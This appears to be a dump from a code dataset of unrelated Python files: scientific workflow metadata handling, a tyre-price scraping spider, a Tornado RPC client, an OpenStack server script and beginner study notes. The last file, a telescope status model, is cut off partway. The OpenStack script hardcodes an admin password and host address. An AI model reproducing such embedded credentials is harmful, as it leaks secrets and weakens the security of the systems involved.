Parameters\n ----------\n suffix: str\n file name extension (if None: use product_data_file_format())\n full_path: bool\n if True: return path + file name, otherwise file name only.\n\n Returns\n -------\n Path\n data file path and name\n\n Raises\n ------\n KeyError\n if data file name is not defined in workflow configuration or in product metadata dict.\n TypeError\n if activity:name and product:filename is None.\n\n \"\"\"\n\n try:\n if self.workflow_config[\"configuration\"][\"test\"]:\n _filename = \"TEST\"\n else:\n _filename = self.workflow_config[\"activity\"][\"id\"]\n if self.workflow_config[\"product\"][\"filename\"]:\n _filename += \"-\" + self.workflow_config[\"product\"][\"filename\"]\n else:\n _filename += \"-\" + self.workflow_config[\"activity\"][\"name\"]\n except KeyError:\n self._logger.error(\"Missing cta:product:id in metadata\")\n raise\n except TypeError:\n self._logger.error(\"Missing activity:name in metadata\")\n raise\n\n if not suffix:\n suffix = \".\" + self.product_data_file_format(suffix=True)\n\n if full_path:\n return Path(self.product_data_directory()).joinpath(_filename + suffix)\n return Path(_filename + suffix)\n\n def product_data_file_format(self, suffix=False):\n \"\"\"\n Return file format for product data.\n\n Parameters\n ----------\n suffix: bool\n Return the ecsv suffix (if format is ascii.ecsv),\n Return file format (if false)\n\n Returns\n -------\n str\n File format of data product; default file format is 'ascii.ecsv'.\n\n Raises\n ------\n KeyError\n if relevant fields are not defined in top level metadata dictionary.\n \"\"\"\n\n _file_format = \"ascii.ecsv\"\n try:\n if self.workflow_config[\"product\"][\"format\"] is not None:\n _file_format = self.workflow_config[\"product\"][\"format\"]\n except KeyError:\n self._logger.info(\"Using default file format for model file: ascii.ecsv\")\n\n if suffix and _file_format == \"ascii.ecsv\":\n _file_format = \"ecsv\"\n\n return _file_format\n\n def product_data_directory(self):\n \"\"\"\n Output directory for data products.\n\n Returns\n -------\n path\n output directory for data products\n\n \"\"\"\n\n _output_dir = self.io_handler.get_output_directory(\n self.workflow_config[\"activity\"][\"name\"], \"product-data\"\n )\n self._logger.debug(f\"Outputdirectory {_output_dir}\")\n return _output_dir\n\n def _fill_association_meta_from_args(self, association_dict):\n \"\"\"\n Append association meta data set through configurator.\n\n Parameters\n ----------\n association_dict: dict\n Dictionary for assocation metadata field.\n\n Raises\n ------\n AttributeError\n if error reading association meta data from args.\n KeyError\n if metadata description cannot be filled.\n\n \"\"\"\n self._logger.debug(f\"Fill metadata from args: {self.args_dict}\")\n\n _association = {}\n try:\n if \"site\" in self.args_dict:\n _association[\"site\"] = self.args_dict[\"site\"]\n if \"telescope\" in self.args_dict:\n _split_telescope_name = self.args_dict[\"telescope\"].split(\"-\")\n _association[\"class\"] = _split_telescope_name[0]\n _association[\"type\"] = _split_telescope_name[1]\n _association[\"subtype\"] = _split_telescope_name[2]\n except KeyError:\n self._logger.error(\"Error reading association meta data from args\")\n raise\n except AttributeError as e:\n self._logger.debug(f\"Missing parameter on command line, use defaults ({e})\")\n\n self._fill_context_sim_list(association_dict, _association)\n\n def _fill_top_level_meta_from_file(self, top_level_dict):\n \"\"\"\n Read and validate metadata from file. Fill metadata into top-level template.\n\n Parameters\n ----------\n top_level_dict: dict\n Dictionary for top level metadata.\n\n Raises\n ------\n KeyError\n if corresponding fields cannot by accessed in the top-level or metadata dictionaries.\n\n \"\"\"\n\n _schema_validator = validate_schema.SchemaValidator()\n try:\n _input_meta = _schema_validator.validate_and_transform(\n meta_file_name=self.workflow_config[\"configuration\"][\"input_meta\"],\n lower_case=True,\n )\n except KeyError:\n self._logger.debug(\"No input metadata file defined\")\n return\n\n try:\n self._merge_config_dicts(top_level_dict, _input_meta)\n except KeyError:\n self._logger.error(\"Error reading input meta data\")\n raise\n # list entry copies\n for association in _input_meta[\"product\"][\"association\"]:\n self._fill_context_sim_list(\n top_level_dict[\"context\"][\"sim\"][\"association\"], association\n )\n try:\n for document in _input_meta[\"context\"][\"document\"]:\n self._fill_context_sim_list(top_level_dict[\"context\"][\"sim\"][\"document\"], document)\n except KeyError:\n top_level_dict[\"context\"][\"sim\"].pop(\"document\")\n\n def _fill_product_meta(self, product_dict):\n \"\"\"\n Fill metadata for data products fields.\n\n Parameters\n ----------\n product_dict: dict\n Dictionary describing data product.\n\n Raises\n ------\n KeyError\n if relevant fields are not defined in top level metadata dictionary.\n\n \"\"\"\n\n product_dict[\"id\"] = self.workflow_config[\"activity\"][\"id\"]\n self._logger.debug(f\"Assigned ACTIVITY UUID {product_dict['id']}\")\n\n product_dict[\"data\"][\"category\"] = \"SIM\"\n product_dict[\"data\"][\"level\"] = \"R0\"\n product_dict[\"data\"][\"type\"] = \"service\"\n product_dict[\"data\"][\"model\"][\"name\"] = \"simpipe-table\"\n product_dict[\"data\"][\"model\"][\"version\"] = \"0.1.0\"\n product_dict[\"format\"] = self.product_data_file_format()\n product_dict[\"filename\"] = str(self.product_data_file_name(full_path=False))\n\n @staticmethod\n def _fill_association_id(association_dict):\n \"\"\"\n Fill association id from site and telescope class, type, subtype.\n\n Parameters\n ----------\n association_dict: dict\n Association dictionary.\n\n \"\"\"\n for association in association_dict:\n try:\n association[\"id\"] = names.simtools_instrument_name(\n association[\"site\"],\n association[\"class\"],\n association[\"type\"],\n association[\"subtype\"],\n )\n except ValueError:\n association[\"id\"] = None\n\n def _fill_activity_meta(self, activity_dict):\n \"\"\"\n Fill activity (software) related meta data\n\n Parameters\n ----------\n activity_dict: dict\n Dictionary for top-level activitiy meta data.\n\n Raises\n ------\n KeyError\n if relevant fields are not defined in top level metadata\n dictionary\n\n \"\"\"\n try:\n activity_dict[\"name\"] = self.workflow_config[\"activity\"][\"name\"]\n activity_dict[\"start\"] = datetime.datetime.now().isoformat(timespec=\"seconds\")\n activity_dict[\"end\"] = activity_dict[\"start\"]\n activity_dict[\"software\"][\"name\"] = \"simtools\"\n activity_dict[\"software\"][\"version\"] = simtools.version.__version__\n except KeyError:\n self._logger.error(\"Error ACTIVITY meta from input meta data\")\n raise\n\n def _read_workflow_configuration(self, workflow_config_file):\n \"\"\"\n Read workflow configuration from file and merge it with existing workflow config. Keys are \\\n changed to lower case.\n\n Parameters\n ----------\n workflow_config_file\n name of configuration file describing this workflow.\n\n \"\"\"\n\n if workflow_config_file:\n try:\n _workflow_from_file = gen.change_dict_keys_case(\n gen.collect_data_from_yaml_or_dict(workflow_config_file, None)[\"CTASIMPIPE\"],\n True,\n )\n self._logger.debug(f\"Reading workflow configuration from {workflow_config_file}\")\n except KeyError:\n self._logger.debug(\"Error reading CTASIMPIPE workflow configuration\")\n\n self._merge_config_dicts(self.workflow_config, _workflow_from_file, True)\n\n def _merge_config_dicts(self, dict_high, dict_low, add_new_fields=False):\n \"\"\"\n Merge two config dicts and replace values in dict_high which are Nonetype. Priority to \\\n dict_high in case of conflicting entries.\n\n Parameters\n ----------\n dict_high: dict\n Dictionary into which values are merged.\n dict_low: dict\n Dictionary from which values are taken for merging.\n add_new_fields: bool\n If true: add fields from dict_low to dict_high, if they don't exist in dict_high\n\n \"\"\"\n\n if dict_high is None and dict_low:\n dict_high = dict_low\n return\n\n for k in dict_low:\n if k in dict_high:\n if isinstance(dict_low[k], dict):\n self._merge_config_dicts(dict_high[k], dict_low[k], add_new_fields)\n elif dict_high[k] is None:\n dict_high[k] = dict_low[k]\n elif dict_high[k] != dict_low[k] and dict_low[k] is not None:\n self._logger.debug(\n f\"Conflicting entries between dict: {dict_high[k]} vs {dict_low[k]} \"\n f\"(use {dict_high[k]})\"\n )\n elif add_new_fields:\n dict_high[k] = dict_low[k]\n\n def input_data_file_name(self):\n \"\"\"\n Return input data file (full path).\n\n Returns\n -------\n str\n Input data file (full path).\n\n Raises\n ------\n KeyError\n if missing description of CONFIGURATON:INPUT_DATA\n \"\"\"\n\n try:\n return self.workflow_config[\"configuration\"][\"input_data\"]\n except KeyError:\n self._logger.error(\"Missing description of CONFIGURATON:INPUT_DATA\")\n raise\n\n @staticmethod\n def _fill_context_sim_list(product_list, new_entry_dict):\n \"\"\"\n Fill list-type entries into metadata. Take into account the first list entry is the default\\\n value filled with Nones.\n\n Returns\n -------\n list\n Updated product list.\n\n \"\"\"\n\n if len(new_entry_dict) == 0:\n return []\n try:\n if any(v is not None for v in product_list[0].values()):\n product_list.append(new_entry_dict)\n else:\n product_list[0] = new_entry_dict\n except (TypeError, IndexError):\n product_list = [new_entry_dict]\n return product_list\n","sub_path":"simtools/data_model/workflow_description.py","file_name":"workflow_description.py","file_ext":"py","file_size_in_byte":15680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"547658499","text":"import re\nimport os\nimport csv\nimport json\nfrom urlparse import urljoin\n\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.response import get_base_url\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom scrapy.exceptions import DontCloseSpider\n\nfrom product_spiders.base_spiders.matcher import Matcher\nfrom product_spiders.items import Product, ProductLoader\n\nfrom micheldeveritems import MicheldeverMeta\nfrom micheldeverutils import find_mts_stock_code, is_product_correct, get_speed_rating, get_alt_speed, \\\n find_brand_segment, unify_brand\n\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\n\nclass TyreGiantSpider(BaseSpider):\n name = 'tyregiant.com_test'\n allowed_domains = ['tyregiant.com']\n start_urls = ('http://www.tyregiant.com/',)\n tyre_sizes = []\n brands = []\n manually_matched = []\n all_man_marks = {}\n\n download_delay = 0.1\n\n def __init__(self, *args, **kwargs):\n super(TyreGiantSpider, self).__init__(*args, **kwargs)\n self.matcher = Matcher(self.log)\n\n with open(os.path.join(HERE, 'mtsstockcodes.csv')) as f:\n reader = csv.DictReader(f)\n for row in reader:\n self.tyre_sizes.append(row)\n\n with open(os.path.join(HERE, 'manmarks.csv')) as f:\n reader = csv.DictReader(f)\n for row in reader:\n self.all_man_marks[row['code']] = row['manufacturer_mark']\n\n self.brands = [row['Brand'] for row in self.tyre_sizes]\n\n self.search_history = set()\n\n self.finished = False\n\n dispatcher.connect(self.spider_idle, signals.spider_idle)\n\n def _get_history_key(self, search_params):\n key = \"%(width)s-%(rim)s-%(aspect_ratio)s-%(speed_rating)s\" % search_params\n return key\n\n def check_in_history(self, search_params):\n if self._get_history_key(search_params) in self.search_history:\n return True\n return False\n\n def add_to_history(self, search_params):\n self.search_history.add(self._get_history_key(search_params))\n\n def spider_idle(self, spider):\n if not self.finished:\n request = Request(self.start_urls[0], dont_filter=True, callback=self.parse)\n self._crawler.engine.crawl(request, self)\n raise DontCloseSpider\n\n def parse(self, response):\n for r in self.next_search():\n yield r\n\n def next_search(self):\n request_sent = False\n for i, row in enumerate(self.tyre_sizes, 1):\n for speed_rating in [row['Speed rating'], row['Alt Speed']]:\n if not speed_rating:\n continue\n\n search_params = {\n 'width': row['Width'],\n 'aspect_ratio': row['Aspect Ratio'],\n 'speed_rating': speed_rating,\n 'rim': row['Rim']\n }\n\n if self.check_in_history(search_params):\n continue\n\n self.log(\"Checking row: %s\" % str({\n 'width': row['Width'],\n 'aspect_ratio': row['Aspect Ratio'],\n 'speed_rating': row['Speed rating'],\n 'rim': row['Rim']\n }))\n\n self.add_to_history(search_params)\n\n url = 'http://www.tyregiant.com/%(width)s-%(aspect_ratio)s-%(rim)s?speed=%(speed_rating)s' % \\\n search_params\n yield Request(url, dont_filter=True, meta={'search_params': search_params}, callback=self.parse_search)\n request_sent = True\n break\n if request_sent:\n break\n else:\n self.finished = True\n return\n\n def parse_search(self, response):\n meta = response.meta\n url = 'http://www.tyregiant.com/update-tyres/1'\n meta['page'] = 1\n yield Request(url, dont_filter=True, callback=self.parse_products, meta=meta)\n\n def parse_products(self, response):\n html_response = json.loads(response.body)['display_tyres']\n hxs = HtmlXPathSelector(text=html_response)\n\n search_params = response.meta['search_params']\n\n products = hxs.select('//div[contains(@class, \"tyre_container\")]')\n\n for product_el in products:\n loader = ProductLoader(item=Product(), selector=product_el)\n\n brand = product_el.select('.//form/span[@class=\"tyre_brand_text\"]/text()').extract()\n brand = brand[0] if brand else ''\n\n winter_tyre = hxs.select('/div/div/div[@class=\"winter_img\"]').extract()\n if not winter_tyre:\n for tyre_brand in self.brands:\n if tyre_brand.upper() == brand.strip().upper():\n brand = tyre_brand\n full_name = product_el.select('.//form/span[@class=\"tyre_brand_text\"]/text()').extract()[-1]\n\n loader.add_value('name', full_name)\n loader.add_value('brand', unify_brand(brand))\n loader.add_value('category', find_brand_segment(loader.get_output_value('brand')))\n identifier = product_el.select('.//input[@name=\"tyre\"]/@value').extract()\n loader.add_value('identifier', identifier)\n\n loader.add_value('url', 'http://www.tyregiant.com')\n\n image_url = product_el.select('.//img[@class=\"tyre_image\"]/@src').extract()\n\n if image_url:\n loader.add_value('image_url', urljoin(get_base_url(response), image_url[0]))\n\n price = product_el.select('.//*[@class=\"tyre_price\"]/span/text()').extract()\n\n if not price:\n loader.add_value('stock', 0)\n\n loader.add_value('price', price)\n\n metadata = MicheldeverMeta()\n metadata['aspect_ratio'] = search_params['aspect_ratio']\n metadata['rim'] = search_params['rim']\n\n tyre_details = product_el.select('.//form/p[@class=\"tyre_details\"]/text()').extract()[0]\n speed = re.search('(\\s\\d+\\w+\\s)', tyre_details)\n load_rating = speed.group().strip()[:-1] if speed else ''\n speed_rating = speed.group().strip()[-1] if speed else ''\n\n metadata['speed_rating'] = speed_rating\n metadata['load_rating'] = load_rating\n\n metadata['width'] = search_params['width']\n\n metadata['fitting_method'] = 'Fitted'\n metadata['alternative_speed_rating'] = ''\n xl = product_el.select('.//img[@class=\"xl_img\"]/@src').extract()\n metadata['xl'] = 'Yes' if xl else 'No'\n run_flat = product_el.select('.//img[@class=\"rf_img\"]/@src').extract()\n metadata['run_flat'] = 'Yes' if run_flat else 'No'\n\n metadata['manufacturer_mark'] = self._get_manufacturer_code(full_name)\n\n metadata['full_tyre_size'] = '/'.join((search_params['width'],\n search_params['aspect_ratio'],\n search_params['rim'],\n metadata['load_rating'],\n metadata['speed_rating']))\n # metadata['alternative_speed_rating']))\n product = loader.load_item()\n product['metadata'] = metadata\n\n if not is_product_correct(product):\n continue\n\n product['metadata']['mts_stock_code'] = find_mts_stock_code(product, spider_name=self.name, log=self.log)\n\n new_speed_rating = get_speed_rating(product)\n new_alt_speed = get_alt_speed(product)\n product['metadata']['alternative_speed_rating'] = new_alt_speed if new_alt_speed else \\\n product['metadata']['speed_rating'] if product['metadata']['speed_rating'] != new_speed_rating else ''\n product['metadata']['speed_rating'] = new_speed_rating\n yield product\n\n if products:\n meta = response.meta\n next_page = meta['page'] + 1\n next_url = 'http://www.tyregiant.com/update-tyres/%s' % str(next_page)\n meta['page'] = next_page\n yield Request(next_url, dont_filter=True, callback=self.parse_products, meta=meta)\n\n def _get_manufacturer_code(self, name):\n name = name.upper()\n for code, manufacturer_mark in self.all_man_marks.items():\n if code not in name:\n continue\n\n if code in name.split(' ') or code == '*':\n return manufacturer_mark\n\n return ''\n\n def match_name(self, search_name, new_item, match_threshold=90, important_words=None):\n r = self.matcher.match_ratio(search_name, new_item, important_words)\n return r >= match_threshold\n","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/micheldever_test/tyregiant_spider.py","file_name":"tyregiant_spider.py","file_ext":"py","file_size_in_byte":9080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"236996663","text":"# coding:utf-8\nfrom __future__ import absolute_import, division, print_function, with_statement\n\nimport collections\nimport struct\nimport functools\nimport time\nimport traceback\nimport datetime\nimport tornado.ioloop\nfrom tornado import queues\nfrom google.protobuf import service\nfrom google.protobuf.message import Message\nfrom tornado.iostream import StreamClosedError\nfrom tornado.tcpclient import TCPClient as T\nimport tornado.gen\nimport tornado.tcpclient\nfrom management import log\nfrom management.ipc.generated.header_pb2 import RequestHeader, ResponseHeader, OK, ResponseStatus, CallHeader\nfrom management.ipc.rpcstream import RpcStream\nfrom management.util import inet_address\n\n\nclass ResponseStatusError(Exception):\n def __init__(self, status, message):\n self.status = status\n self.message = message\n\n def __str__(self):\n message = \"RPC %s\" % ResponseStatus.Name(self.status)\n if self.message:\n return message + \" (\" + self.message + \")\"\n else:\n return message\n\n\nclass TCPClient(T):\n def _create_stream(self, max_buffer_size, af, addr):\n # Always connect in plaintext; we'll convert to ssl if necessary\n # after one connection has completed.\n stream = RpcStream(tornado.tcpclient.socket.socket(af),\n io_loop=self.io_loop,\n max_buffer_size=max_buffer_size)\n return stream.connect(addr)\n\n\nclass Client(service.RpcChannel):\n LOG = log.getLogger(\"Client\")\n\n def __init__(self, port, io_loop=None, **kwargs):\n self.io_loop = io_loop or tornado.gen.IOLoop.current()\n self.host, self.port = inet_address(port)\n self.tcp_client = TCPClient(io_loop=self.io_loop)\n self.queue = queues.Queue()\n self._connect_future = None\n self.stream = None\n self.close_timeout = None\n self._call_count = 0\n self._max_count = 100 # TODO 多少个请求后断开连接\n self._process_queue()\n\n def get_service_name(self):\n raise NotImplementedError()\n\n def CallMethod(self, method_descriptor, rpc_controller, request, response_class, done):\n self._call_count += 1\n future = tornado.gen.Future()\n self.queue.put((request, method_descriptor, response_class, future))\n self.LOG.debug(\"add %s call queue, qsize %s\", method_descriptor.name, self.queue.qsize())\n self.set_close_timeout()\n return future\n\n def set_close_timeout(self, d=60):\n if self.close_timeout:\n self.io_loop.remove_timeout(self.close_timeout)\n self.close_timeout = self.io_loop.add_timeout(datetime.timedelta(seconds=d), self.close)\n\n def close(self):\n self.LOG.info(\"stream close\")\n if self.stream:\n try:\n self.stream.close()\n except:\n pass\n self._connect_future = self.stream = None\n self._call_count = 0\n if self.close_timeout:\n self.io_loop.remove_timeout(self.close_timeout)\n\n @tornado.gen.coroutine\n def connect(self):\n self.LOG.info(\"client start connect\")\n while 1:\n try:\n self.stream = yield self.tcp_client.connect(self.host, self.port)\n self.LOG.info(\"client connect %s:%s success\", self.host, self.port)\n break\n except StreamClosedError:\n self.LOG.info(\"stream closed error sleep 3 reconnect queue size %s\", self.queue.qsize())\n yield tornado.gen.sleep(3)\n continue\n yield self.stream.write_sign()\n yield self.write_header(self.stream)\n raise tornado.gen.Return(self.stream)\n\n @tornado.gen.coroutine\n def _process_queue(self):\n while 1:\n request, method_descriptor, response_class, future = yield self.queue.get()\n self.LOG.debug(\"call %s start\", method_descriptor.name)\n if not self._connect_future:\n self._connect_future = self.connect()\n stream = yield self._connect_future\n self.LOG.info(\"call %s success queue size %s\", method_descriptor.name, self.queue.qsize())\n try:\n yield self.write_request(stream, request, method_descriptor)\n response = yield self.receiver(stream, response_class)\n future.set_result(response)\n except Exception as e:\n traceback.print_exc()\n self.close()\n self.LOG.error(e)\n future.set_exception(e)\n finally:\n if self._call_count > self._max_count:\n self.close()\n\n @tornado.gen.coroutine\n def write_request(self, stream, request, method_descriptor):\n self.set_close_timeout()\n yield stream.write1(CallHeader(service=self.get_service_name(),\n method_index=method_descriptor.index).SerializeToString())\n yield stream.write1(request.SerializeToString())\n\n @tornado.gen.coroutine\n def receiver(self, stream, response_class):\n self.set_close_timeout()\n header_data = yield stream.read1()\n header = ResponseHeader()\n header.ParseFromString(header_data)\n if header.status != OK:\n raise ResponseStatusError(header.status, header.message)\n else:\n data = yield stream.read1()\n response = response_class()\n response.ParseFromString(data)\n raise tornado.gen.Return(response)\n\n @tornado.gen.coroutine\n def write_header(self, stream):\n header = RequestHeader()\n yield stream.write1(header.SerializeToString())\n","sub_path":"management/ipc/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"252550448","text":"import openstack\nfrom openstack.config import loader\nimport sys\n\nconfig = loader.OpenStackConfig()\n\ndef _get_resource_value(resource_key, default):\n return config.get_extra_config('example').get(resource_key, default)\n\n\nSERVER_NAME = 'prototipo2'\nIMAGE_NAME = 'bionic'\nFLAVOR_NAME = 'm1.small'\nNETWORK_NAME = 'internal'\nKEYPAIR_NAME = 'mykey'\n\n\n\n\ndef create_connection(auth_url, region, project_name, username, password):\n\n return openstack.connect(\n auth_url=auth_url,\n project_name=project_name,\n username=username,\n password=password,\n region_name=region,\n app_name='examples',\n app_version='1.0',\n )\n\ndef list_flavors(conn):\n print(\"List Flavors:\")\n\n for flavor in conn.compute.flavors():\n print(flavor)\n\n\ndef create_server(conn):\n print(\"Create Server:\")\n\n image = conn.compute.find_image(IMAGE_NAME)\n flavor = conn.compute.find_flavor(FLAVOR_NAME)\n network = conn.network.find_network(NETWORK_NAME)\n keypair = conn.compute.find_keypair(KEYPAIR_NAME)\n\n server = conn.compute.create_server(\n name=SERVER_NAME, image_id=image.id, flavor_id=flavor.id,\n networks=[{\"uuid\": network.id}], key_name=keypair.name)\n\n server = conn.compute.wait_for_server(server)\n\n\ndef delete_server(conn):\n print(\"Delete Server:\")\n\n server = conn.compute.find_server(SERVER_NAME)\n\n print(server)\n\n conn.compute.delete_server(server)\n\n\nconn = create_connection(\"http://192.168.0.26:5000/v3\", \"RegionOne\", \"admin\", \"admin\", \"uSh1eexei2waich7\")\nprint(conn)\n\nlist_flavors(conn)\ncreate_server(conn)\ndelete_server(conn)\n","sub_path":"Roteiro3/prototipo2_H3.py","file_name":"prototipo2_H3.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"526499962","text":"x = 2\nhelp(x) # shows the info of x\n\ndir() # lists the objects in a name paticular namespace\nglobals() and locals() # shows the values associated with the objects\n\n5 // 2 # truncation of the division result\nx = (3+2j) ** (2+3j) # there must be a nuumber before j to indicate it is a complex number\nx.real\nx.imag\nround(3.49) # result is 3, while round(3.6) is 4. This is built-in function\nimport math\nmath.ceil(3.49) # this gives 4\n\n#boolean\nx = False\nnot x # True\n\n#list\n# A list can be indexed from its front or back\nx = [\"first\", \"second\", \"third\", \"fourth\"]\nx[-1]\nx[0] # starting from 0\nx[:3]\nx[-2:]\nx[0:3] # starts from x[0] but ends at x[2] which is right before x[3]\nx[0:2] = [6.0, 6.5, 7.0] # the size of the list increases or decreases if the new\n# slice is bigger or smaller than the slice it's replacing.\n\nx = [1,2,3,4,5,6,7,8,9]\nlen(x) # 9\n[-1,0] + x # [-1,0,1,2,..]\nx.reverse()\n2 * x # [1,2,3,...9,1,2,..9] create a copy of x before itself\n\n\n# Tuples\n# Tuples are like lists but are immutable. There are only two methods for Tuples: count and index\n(1,) # one element tuple needs a comma\nx = [1,2,3,4]\ntuple(x) # convert a list to a tuple\nlist(x) # convert a tuple back to a list\n\n\n# strings\n# Strings can be delimited by single (' '), double (\" \"), triple single (''' '''), or triple\n#double (\"\"\" \"\"\") quotations and can contain tab (\\t) and newline (\\n) characters.\n\nx = \"live and let \\t \\tlive\"\nx.split() # ['live','and','let','live']\nx.replace(\" let \\t \\tlive\", \"enjoy life\") # 'live and enjoy life'\nimport re\nregexpr = re.compile(r\"[\\t]+\")\nregexpr.sub(\" \", x) # yields 'live and let live'\n# The re module q provides regular expression functionality.\n\ne = 2.718\nx = [1, \"two\", 3, 4.0, [\"a\", \"b\"], (5, 6)]\nprint(\"The constant e is:\", e, \"and the list x is:\", x)\n#The constant e is: 2.718 and the list x is: [1, 'two', 3, 4.0,\n#['a', 'b'], (5, 6)]\nprint(\"the value of %s is: %.2f\" % (\"e\", e))\n#the value of e is: 2.72\n#The % operator w provides a formatting capability similar to that of C’s sprintf.\n\n# Dictionaries\nx = {1: \"one\", 2: \"two\"}\nx[\"first\"] = \"one\"\nx[(\"Delorme\", \"Ryan\", 1995)] = (1, 2, 3)\nlist(x.keys())\n# ['first', 2, 1, ('Delorme', 'Ryan', 1995)]\nx[1]\n#'one'\nx.get(1, \"not available\")\n#'one'\nx.get(4, \"not available\")\n#'not available'\n\n# Sets\n# A set in Python is an unordered collection of objects, used in situations where membership\n#and uniqueness in the set are the main things you need to know about that object.\n\nx = set([1, 2, 3, 1, 3, 5])\nx\n#{1, 2, 3, 5}\n1 in x\n#True\n4 in x\n#False\n\n# function\n\ndef funct3(x, y=1, z=1, *tup):\n print((x, y, z) + tup)\n \nfunct3(2)\n#(2, 1, 1)\nfunct3(1, 2, 3, 4, 5, 6, 7, 8, 9)\n#(1, 2, 3, 4, 5, 6, 7, 8, 9)\ndef funct4(x, y=1, z=1, **dictionary):\n\tprint(x, y, z, dict)\nfunct4(1, 2, m=5, n=9, z=3)\n#1 2 3 {'n': 9, 'm': 5}\n\n# Module Creation\n\"\"\"wo module. Contains function: words_occur()\"\"\"","sub_path":"Quick_python_book1.py","file_name":"Quick_python_book1.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"316510178","text":"#!/usr/bin/env python\n\"\"\"An object that models the current state of the TCC.\n\nIt contains instance variables that are KeyVariables\nor sets of KeyVariables. Most of these are directly associated\nwith status keywords and a few are ones that I generate.\n\nThus it is relatively easy to get the current value of a parameter\nand it is trivial to register callbacks for when values change\nor register ROWdg widgets to automatically display updating values.\n\n2003-03-26 ROwen\n2003-04-02 ROwen Added axis limits and iimScale.\n2003-04-04 ROwen Added all offsets and axis limits.\n2003-04-07 ROwen Bug fix: iimScale was not being dispatched.\n2003-04-14 ROwen Removed unused imports.\n2003-04-29 ROwen Bug fix: RotExists was int, not bool;\n this caused failure in Python 2.3b1.\n2003-05-08 ROwen Modified to use RO.CnvUtil.\n2003-05-28 ROwen Added slewDuration and slewEnd;\n changed coordSys and rotType to expand the short names\n used by the TCC to the longer names used internally in TUI.\n2003-06-09 ROwen Modified to get the dispatcher from TUI.TUIModel.\n2003-06-11 ROwen Renamed coordSys -> objSys;\n modified objSys to use RO.CoordSys constants instead of names;\n made keyword Inst uppercase.\n2003-10-30 ROwen Added tccPos.\n2003-12-03 ROwen Added guidePrep, guideStart\n2004-01-06 ROwen Modified to use KeyVarFactory.\n2004-08-11 ROwen Modified to allow NaN for the axis status word\n in ctrlStatusSet (this shows up as \"None\" as isCurrent=True).\n Bug fix: was not refreshing rotator status in ctrlStatusSet;\n modified to optionally refresh it (since it may be missing)\n using new refreshOptional argument in RO.KeyVariable.KeyVarFactory.\n2005-06-03 ROwen Improved indentation uniformity.\n2006-02-21 ROwen Modified to use new correctly spelled keyword SlewSuperseded.\n2006-03-06 ROwen Added axisCmdState (which supersedes tccStatus).\n Modified to set rotExists from axisCmdState (instead of tccStatus)\n and to only set it when the state (or isCurrent) changes.\n2007-01-29 ROwen Added instPos, gimCtr, gimLim, gimScale.\n2007-07-25 ROwen Added tai and utcMinusTAI.\n2007-09-28 ROwen Modified _cnvRotType to raise ValueError instead of KeyError for bad values\n (because keyword conversion functions should always do that).\n Modified _cnvObjSys to raise ValueError instead of returning None for bad values.\n2008-02-01 ROwen Fixed rotType; it was always set to None due to an error in _cnvRotType.\n2008-03-25 ROwen Removed obsolete gcFocus; get gmech focus from the gmech actor.\n2010-03-04 ROwen Added moveItems.\n2010-06-28 ROwen Removed unused _RotTypeDict (thanks to pychecker).\n2010-09-24 ROwen Added keywords.\n2011-07-14 ROwen Added ipConfig, gcFocus, gcFocusLim, gcNomFocus, instFocus, rotInstXYAng and rotOffsetScale;\n all of these except ipConfig and gcFocus are new in TCC 2.15.0.\n2014-04-23 ROwen Added gProbeDict\n2014-07-21 ROwen Added DesEncMount and EncMount.\n\"\"\"\nfrom collections import OrderedDict\n\nimport RO.CnvUtil\nimport RO.CoordSys\nimport RO.KeyVariable\nimport TUI.TUIModel\n\n_theModel = None\n\ndef getModel():\n global _theModel\n if _theModel == None:\n _theModel = _Model()\n return _theModel\n\ndef _cnvObjSys(tccName):\n \"\"\"Converts a coordinate system name from the names used in the TCC keyword ObjSys\n to the RO.CoordSys constants used locally. Case-insensitive.\n\n Raise ValueError if tccName not a valid TCC ObjSys.\n \"\"\"\n #print \"_cnvObjSys(%r)\" % tccName\n try:\n tuiName = dict(\n icrs = 'ICRS',\n fk5 = 'FK5',\n fk4 = 'FK4',\n gal = 'Galactic',\n geo = 'Geocentric',\n topo = 'Topocentric',\n obs = 'Observed',\n phys = 'Physical',\n mount = 'Mount',\n none = 'None',\n )[tccName.lower()]\n except KeyError:\n raise ValueError()\n return RO.CoordSys.getSysConst(tuiName)\n\ndef _cnvRotType(tccName):\n \"\"\"Converts a rotation type name from the names used in the TCC keyword RotType\n to the (longer) names used locally. Case-insensitive.\n\n Raise ValueError if tccName not a valid TCC RotType.\n \"\"\"\n #print \"_cnvRotType(%r)\" % (tccName,)\n try:\n return dict(\n obj = 'Object',\n horiz = 'Horizon',\n phys = 'Physical',\n mount = 'Mount',\n none ='None',\n )[tccName.lower()]\n except KeyError:\n raise ValueError()\n\nclass _Model (object):\n def __init__(self,\n **kargs):\n self.actor = \"tcc\"\n self.dispatcher = TUI.TUIModel.getModel().dispatcher\n keyVarFact = RO.KeyVariable.KeyVarFactory(\n actor = self.actor,\n converters = str,\n dispatcher = self.dispatcher,\n )\n pvtVarFact = RO.KeyVariable.KeyVarFactory(\n keyVarType = RO.KeyVariable.PVTKeyVar,\n actor = self.actor,\n naxes = 1,\n dispatcher = self.dispatcher,\n )\n\n self.axisNames = (\"Az\", \"Alt\", \"Rot\")\n\n # user-specified values\n\n self.objName = keyVarFact(\n keyword = \"ObjName\",\n nval = 1,\n converters = str,\n description = \"name of current target\",\n )\n\n self.objSys = keyVarFact(\n keyword = \"ObjSys\",\n converters = (_cnvObjSys, RO.CnvUtil.asFloatOrNone),\n description = \"Coordinate system name, date\",\n defValues = (RO.CoordSys.getSysConst(\"\"), None),\n )\n\n self.netObjPos = pvtVarFact(\n keyword = \"ObjNetPos\",\n naxes = 2,\n description = \"Net object position, including user and arc offsets\",\n )\n\n self.objOff 